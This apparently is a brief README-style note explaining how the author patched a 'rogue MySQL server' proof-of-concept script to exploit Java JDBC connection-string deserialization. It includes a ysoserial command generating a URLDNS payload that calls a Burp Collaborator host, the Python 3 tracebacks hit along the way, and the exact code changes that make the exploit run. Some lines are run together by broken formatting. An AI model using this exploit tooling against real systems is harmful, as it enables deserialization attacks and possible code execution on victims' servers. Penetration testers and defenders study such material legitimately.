Modified version of the 'rogue-mysql-server.py' script from https://landgrey.me/blog/11/ to exploit JDBC connection string deserialization. All credit to the original author.
python3 rogue-mysql-server.pyjava -jar ysoserial.jar URLDNS 'https://blahblahblah.burpcollaborator.net' > /tmp/payload.ser
Quick reference of the changes that I needed to make in order to get this PoC working from the original blog post.
Put the file in tmp because why not
deserialization_file = r'/tmp/payload.ser'
Due to this error:
Traceback (most recent call last):
File "rogue-mysql-server.py", line 102, in <module>
run_mysql_server()
File "rogue-mysql-server.py", line 63, in run_mysql_server
_payload_hex = str(hex(len(deserialization_payload)/2)).replace('0x', '').zfill(4)
TypeError: 'float' object cannot be interpreted as an integerUpdated these lines to use // to do float division
_payload_hex = str(hex(len(deserialization_payload)//2)).replace('0x', '').zfill(4)_data_hex = str(hex(len(deserialization_payload)//2 + 5)).deserialization_payload is raw bytes and needs to be decoded into a str before we can concatenate. This is to fix this traceback.
Traceback (most recent call last):
File "rogue-mysql-server.py", line 102, in <module>
run_mysql_server()
File "rogue-mysql-server.py", line 67, in run_mysql_server
_data += _data_length + '04' + '0131fc' + _payload_length + deserialization_payload
TypeError: can only concatenate str (not "bytes") to strWe change
_data += _data_length + '04' + '0131fc' + _payload_length + deserialization_payloadto
_data += _data_length + '04' + '0131fc' + _payload_length + deserialization_payload.decode()